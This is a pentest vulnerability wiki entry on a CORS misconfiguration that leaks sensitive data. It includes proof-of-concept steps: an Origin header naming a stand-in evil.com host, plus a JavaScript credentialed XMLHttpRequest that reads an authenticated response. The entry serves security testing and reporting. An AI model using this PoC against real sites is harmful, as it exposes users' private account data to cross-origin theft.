Cobalt Crowdsourced Application PentestCobalt Crowdsourced Application PentestCobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V14 - Config

CORS (Cross-Origin Resource Sharing) Vulnerability Leaking Sensitive Data

POC

  • Add the following HTTP Request header: Origin: https://www.evil.com
  • The Access-Control-Allow-Credentials: true and Access-Control-Allow-Origin: https://www.evil.com server response headers indicate that the server will respond to any authenticated requests from any origin, even if it is trusted or not.
  • Open the following HTML file and observe the sensitive data is disclosed:

CORS PoC

Exploit function cors() { var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (this.readyState == 4 && this.status == 200) { document.getElementById("demo").innerHTML = alert(this.responseText); } }; xhr.open("GET", "URL-here", true); xhr.withCredentials = true; xhr.send(); }

Impact

Medium-High (depends on the criticality of sensitive data)

Likelihood

Medium-High